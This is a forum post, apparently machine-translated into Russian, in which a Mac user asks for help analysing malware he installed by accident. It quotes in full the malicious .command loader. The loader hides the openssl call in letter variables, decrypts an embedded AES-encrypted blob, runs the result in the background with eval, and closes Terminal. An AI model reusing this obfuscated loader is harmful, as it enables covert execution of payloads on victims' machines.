Я недавно узнал, что случайно установил вредоносное ПО на мою ма c. Существует два файла: файл сценария и файл .command, который при запуске расшифровывает файл сценария и запускает его. Извините, если я использую запутанную формулировку. Я не слишком знаком с этим материалом, и поэтому прошу вас всех.
Вот содержимое файла .command:
#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal
А вот изображение файла сценария и файл .command (содержимое файла сценария было слишком велико для размещения здесь, но это всего лишь набор шифрований): Изображение файла .command и файла сценария, который расшифровывается
Я хочу чтобы точно увидеть, что делает эта вредоносная программа, но я не знаю, как go расшифровать команду, которая затем расшифровывает файл сценария. До сих пор я пытался скопировать файл .command и файл сценария в новую папку, а затем удалить две последние строки файла .command (я слышал, что это предотвратит установку вредоносного ПО). Затем я попытался запустить измененный файл .command в новой папке, но получил предупреждение: «Файл« v.command »не может быть выполнен, поскольку у вас нет соответствующих прав доступа».
Я посмотрел в inte rnet руководства о том, как делать такие вещи, но я не мог по-настоящему следовать ни одному из них, потому что они применяли расшифровку openssl к самодельным файлам, и так как у меня нет большого опыта работы с openssl или терминал Ma c, это очень сбивало с толку.
Будем весьма благодарны за любые инструкции о том, что я могу сделать, чтобы увидеть, что эта вредоносная программа делает с моей Ma c. Я знаю, что другие здесь расшифровали очень похожие вредоносные программы, и я знаю, что это, вероятно, то же самое, но я хочу убедиться, что это не что-то другое / хуже. Кроме того, если у кого-нибудь есть какие-либо советы по изменению того, что это сделало с моей мамой c, то, во всяком случае, также будет очень благодарен! Хорошего дня!
-Chris